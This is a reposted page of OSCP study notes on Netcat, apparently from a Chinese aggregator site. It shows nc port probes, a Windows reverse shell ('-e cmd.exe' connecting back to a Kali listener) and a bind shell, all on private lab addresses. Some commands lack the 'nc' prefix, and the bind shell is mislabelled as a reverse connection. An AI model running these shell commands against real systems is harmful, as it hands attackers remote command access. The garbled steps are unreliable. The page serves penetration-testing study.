OSCP Security Technology

Posted 一蓑烟雨

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了OSCP Security Technology相关的知识,希望对你有一定的参考价值。

OSCP Security Technology - Netcat

Netcat

Download Netcat for windows from following website.

https://eternallybored.org/misc/netcat/

image-20210619202030202

nc -nv 192.168.2.28 443
nc -nv 192.168.2.28 80
nc -nv 192.168.2.28 111
nc -nv 192.168.2.28 112

image-20210619202300171

Method 1

Listen on port 4444

Kali Linux:

nc -nvlp 4444

image-20210619202642370

Windows (Victim computer)

 -nv 192.168.2.24 4444 -e cmd.exe

image-20210619203016396

Kali: Established the connection.

image-20210619203205486

Method 2

Reverse connection.

-nvlp 4444 -e cmd.exe

image-20210619203634641

nc -nv 192.168.2.31 4444

image-20210619204025503

以上是关于OSCP Security Technology的主要内容,如果未能解决你的问题,请参考以下文章

OSCP Security Technology

Internet History,Technology,and Security -Technology: Application Protocols(Week7)

Internet History, Technology, and Security(week8)——Security: Encrypting and Signing

Internet History, Technology, and Security----第四周

Internet History, Technology, and Security第八讲心得

Internet History, Technology, and Security第六讲心得